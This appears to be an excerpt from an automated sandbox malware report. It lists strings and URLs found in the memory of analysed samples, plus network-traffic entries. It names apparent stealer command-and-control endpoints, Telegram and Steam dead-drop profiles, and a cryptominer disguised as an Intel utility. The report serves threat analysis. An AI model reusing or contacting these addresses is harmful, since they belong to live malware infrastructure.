                          Source: f0aeaa9386.exe, 00000006.00000000.2834563596.0000000000423000.00000002.00000001.01000000.00000009.sdmp, f0aeaa9386.exe, 00000006.00000003.2837509672.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                          Source: Dry.com, 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmp, Volunteer.28.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: skotes.exe, 00000005.00000003.3334552390.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
                          Source: Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                          Source: Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                          Source: db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
                          Source: db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000002.3041796343.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
                          Source: db77c3e215.exe, 0000002E.00000002.3041593577.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/v
                          Source: db77c3e215.exe, 0000002E.00000002.3041344893.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/y;
                          Source: random[2].exe0.5.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: Dry.com, 0000002C.00000002.3802571549.000000000061D000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop
                          Source: Dry.com, 0000002C.00000002.3812151194.0000000004180000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3812410985.0000000004217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop/
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop243684eab2gle
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000005F9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop7QQ9ZMng
                          Source: Dry.com, 0000002C.00000002.3802571549.000000000077C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.000000000064C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://frostman.shop;
                          Source: Dry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.000000000077C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://frostman.shopa
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
                          Source: 4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: 4fa7efe79d.exe, 00000031.00000003.3317884862.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3165945522.0000000003827000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3255593966.00000000010F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                          Source: 4fa7efe79d.exe, 00000031.00000002.3354005285.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3347644915.00000000010F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/$
                          Source: 4fa7efe79d.exe, 00000031.00000003.3190575605.0000000003831000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3251773501.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3341633899.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000002.3353112558.000000000107E000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3341633899.000000000104C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3255523505.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3341633899.000000000107A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                          Source: 4fa7efe79d.exe, 00000031.00000003.3341633899.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000002.3353786909.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3269260306.00000000010E1000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3255523505.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3317884862.00000000010E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api74
                          Source: 4fa7efe79d.exe, 00000031.00000003.3251773501.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3251883939.00000000010F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
                          Source: skotes.exe, 00000005.00000003.3334552390.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sci.libertyreserve.com/
                          Source: skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drString found in binary or memory: https://sectigo.com/CPS0
                          Source: Dry.com, 0000002C.00000003.3133503211.0000000004181000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3807607263.0000000001927000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133557173.0000000001937000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                          Source: Dry.com, 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                          Source: 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000002.3041593577.0000000000A87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat/api
                          Source: Dry.com, 0000002C.00000003.3133365512.000000000194F000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133312645.00000000019EC000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133856971.00000000019EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                          Source: Dry.com, 0000002C.00000003.3133365512.000000000194F000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133312645.00000000019EC000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133856971.00000000019EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                          Source: Dry.com, 0000002C.00000002.3807607263.0000000001A1D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133503211.0000000004181000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3807607263.0000000001927000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.000000000061D000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133557173.0000000001937000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3812151194.0000000004180000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                          Source: Dry.com, 0000002C.00000002.3812151194.0000000004180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelGI)
                          Source: Dry.com, 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                          Source: 3f5e6ed253.exe, 00000033.00000002.3375144343.0000000003DB0000.00000004.00000800.00020000.00000000.sdmp, 3f5e6ed253.exe, 00000033.00000002.3371941837.0000000001529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/
                          Source: 3f5e6ed253.exe, 00000033.00000002.3375144343.0000000003DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/B
                          Source: 3f5e6ed253.exe, 00000033.00000002.3375144343.0000000003DB0000.00000004.00000800.00020000.00000000.sdmp, 3f5e6ed253.exe, 00000033.00000002.3371941837.0000000001467000.00000004.00000020.00020000.00000000.sdmp, 3f5e6ed253.exe, 00000033.00000002.3371941837.000000000153C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treehoneyi.click/api
                          Source: Dry.com, 0000002C.00000002.3807607263.0000000001A1D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.000000000061D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                          Source: Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                          Source: Saved.28.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                          Source: Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: Saved.28.drString found in binary or memory: https://www.globalsign.com/repository/0
                          Source: Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                          Source: 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                          Source: Dry.com, 0000002C.00000002.3816983677.0000000006EF3000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: Dry.com, 0000002C.00000002.3816983677.0000000006EF3000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                          Source: Dry.com, 0000002C.00000002.3816983677.0000000006EF3000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: 3dd71a48b2.exe.5.drString found in binary or memory: https://www.ssl.com/repository0
                          Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                          Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                          Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
